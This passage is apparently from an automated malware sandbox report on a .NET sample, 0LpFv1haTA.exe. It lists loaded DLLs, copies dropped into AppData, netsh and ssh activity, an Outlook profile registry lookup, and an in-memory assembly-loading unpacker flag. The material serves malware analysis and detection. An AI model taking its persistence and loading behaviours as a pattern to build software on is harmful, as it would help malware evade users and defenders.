                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: httpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: 0LpFv1haTA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 0LpFv1haTA.exeStatic file information: File size 9593944 > 1048576
                      Source: 0LpFv1haTA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Xml.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Configuration.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: rlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Core.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.PDB,D source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Management.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Management.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: rlib.pdba source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Core.pdb` source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.pdb ` source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.pdb` source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbh source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629A0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Configuration.pdbP source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: manager.exe.7.dr, DllHandler.cs.Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
                      Source: manager.exe.7.dr, DllHandler.cs.Net Code: DllNodeHandler
                      Source: manager.exe.41.dr, DllHandler.cs.Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
                      Source: manager.exe.41.dr, DllHandler.cs.Net Code: DllNodeHandler
                      Source: 0LpFv1haTA.exeStatic PE information: 0xC879E997 [Fri Jul 31 14:54:15 2076 UTC]
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeCode function: 0_2_00007FF848F000BD pushad ; iretd 0_2_00007FF848F000C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 7_2_00007FF848F100BD pushad ; iretd 7_2_00007FF848F100C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F100BD pushad ; iretd 13_2_00007FF848F100C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 40_2_00007FF848F200BD pushad ; iretd 40_2_00007FF848F200C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 46_2_00007FF848F300BD pushad ; iretd 46_2_00007FF848F300C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 47_2_00007FF848F100BD pushad ; iretd 47_2_00007FF848F100C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 48_2_00007FF848F100BD pushad ; iretd 48_2_00007FF848F100C1
